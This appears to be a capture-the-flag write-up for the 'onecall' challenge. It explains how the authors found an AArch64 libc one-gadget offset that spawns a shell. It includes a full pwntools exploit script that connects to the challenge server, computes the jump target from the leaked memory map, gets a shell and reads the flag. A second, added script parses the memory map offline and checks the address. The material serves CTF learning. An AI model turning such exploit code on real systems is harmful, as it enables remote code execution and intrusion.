
Under x86/x64 there are so-called "magic addresses" or "one gadgets": addresses inside libc that spawn a shell as soon as control lands on them, without having to set up stack arguments first; you only need to jump there [1] [2]. Both of the cited tools target x86, and this challenge's binary is AArch64 (the final jump is a `BLR X1`), so for this challenge we tried to find such an address by hand and at first had problems finding one within `do_system` (called by `system` within libc). After a while we instead looked at the places where the string `"/bin/sh"` is referenced (in IDA, press `x` on the string `"/bin/sh"` to list its cross-references) and found a working address near one of those references, at offset `0x9B9A0` from the start of libc. Note that this offset is specific to the libc build shipped with the challenge; a different libc needs a different offset. With that, all we have to do is take the libc base address from the memory mappings the program prints, add `0x9B9A0`, and send the result to the program, which then jumps to it (`BLR X1` at `0x40097C` within the `onecall` binary).

That's all!

Here is the full code:

```python
#!/usr/bin/env python2

from pwn import *
import struct

# Offset of the working "magic address" inside the challenge's libc (found with IDA, see above).
MAGIC_OFFSET = 0x9B9A0

p = remote("onecall.teaser.insomnihack.ch", 1337)

# The service prints its memory mappings (one line per mapping), then asks where to jump.
mapping = p.recvuntil("Where do we go from here ?").split("\n")

LIBC_BASE = None
for line in mapping:
    if "libc.so.6" in line:
        # The first libc line is the lowest mapping, i.e. the libc base; stop there
        # so a later libc data segment does not overwrite it.
        LIBC_BASE = int(line.split("-")[0], 16)
        break

target = LIBC_BASE + MAGIC_OFFSET
log.info("libc base: %#x, jumping to %#x" % (LIBC_BASE, target))

# Consume the rest of the prompt line, then send the address the binary will BLR to.
# The original script imported struct but lost the send line; sending the address as
# a raw 8-byte little-endian value is an assumption based on that import.
response = p.recvline()
p.send(struct.pack("<Q", target))

# The gadget gives us a shell; read the flag through it.
p.sendline("cat flag.txt")
response = p.recvline()
print("The flag: {}".format(response))
```
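The fragile part of the script above is turning the printed memory map into a libc base: taking the wrong libc line, or an offset from a different libc build, sends the program to a non-executable address and kills it. The following is an added example, not code from the writeup, that parses `/proc/<pid>/maps`-style output offline, derives the base as `start - file_offset` of the lowest libc mapping (so versioned names such as `libc-2.27.so` work too), and refuses to pack an address that does not land in an executable libc mapping. The mapping text is constructed for the example, the function and regex names are my own, and the 8-byte little-endian packing is an assumption about how the challenge reads the address.

```python
import re
import struct

# Offset of the magic address from the writeup; valid only for the challenge's libc build.
MAGIC_OFFSET = 0x9B9A0

# One /proc/<pid>/maps line: start-end perms file_offset dev inode [path]
MAPS_LINE_RE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+([0-9a-f]+)\s+\S+\s+\d+\s*(.*)$"
)
# Matches libc.so.6 as well as versioned names like libc-2.27.so.
LIBC_NAME_RE = re.compile(r"/libc(?:-[\d.]+)?\.so(?:\.\d+)?$")

# Constructed sample output (AArch64-style addresses), including the prompt the service prints.
SAMPLE_MAPS = """\
00400000-00401000 r-xp 00000000 08:01 1234 /home/user/onecall
00410000-00411000 r--p 00000000 08:01 1234 /home/user/onecall
00411000-00412000 rw-p 00001000 08:01 1234 /home/user/onecall
ffff8a4d0000-ffff8a613000 r-xp 00000000 08:01 5678 /lib/aarch64-linux-gnu/libc.so.6
ffff8a613000-ffff8a622000 ---p 00143000 08:01 5678 /lib/aarch64-linux-gnu/libc.so.6
ffff8a622000-ffff8a626000 r--p 00142000 08:01 5678 /lib/aarch64-linux-gnu/libc.so.6
ffff8a626000-ffff8a628000 rw-p 00146000 08:01 5678 /lib/aarch64-linux-gnu/libc.so.6
ffff8a660000-ffff8a67c000 r-xp 00000000 08:01 9012 /lib/aarch64-linux-gnu/ld-2.27.so
fffff7a00000-fffff7a21000 rw-p 00000000 00:00 0 [stack]
Where do we go from here ?"""


def parse_maps(maps_text):
    """Return (start, end, perms, file_offset, path) tuples; non-mapping lines are skipped."""
    entries = []
    for line in maps_text.splitlines():
        m = MAPS_LINE_RE.match(line.strip())
        if not m:
            continue  # prompt text or other noise
        start, end, perms, file_off, path = m.groups()
        entries.append((int(start, 16), int(end, 16), perms, int(file_off, 16), path))
    return entries


def libc_base(entries):
    """Base = start - file offset, taken from the lowest libc mapping (the text segment)."""
    libc = [e for e in entries if LIBC_NAME_RE.search(e[4])]
    if not libc:
        raise ValueError("no libc mapping found")
    lowest = min(libc, key=lambda e: e[0])
    return lowest[0] - lowest[3]


def gadget_address(maps_text, offset=MAGIC_OFFSET):
    """Compute base + offset and check it lies inside an executable libc mapping."""
    entries = parse_maps(maps_text)
    target = libc_base(entries) + offset
    executable = any(
        s <= target < e and "x" in perms and LIBC_NAME_RE.search(path)
        for s, e, perms, _, path in entries
    )
    if not executable:
        raise ValueError("offset 0x%x does not land in an executable libc mapping" % offset)
    return target


def pack_address(addr):
    """Raw 8-byte little-endian encoding (assumed input format for the BLR target)."""
    return struct.pack("<Q", addr)


if __name__ == "__main__":
    addr = gadget_address(SAMPLE_MAPS)
    print("jump target: %#x -> %r" % (addr, pack_address(addr)))
```

In a live exploit the text fed to `gadget_address` is whatever `p.recvuntil(...)` returned; the sanity check is what turns a wrong offset into a clear error locally instead of a silent crash on the remote side.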

[1] https://github.com/m1ghtym0/magic_gadget_finder

[2] https://github.com/david942j/one_gadget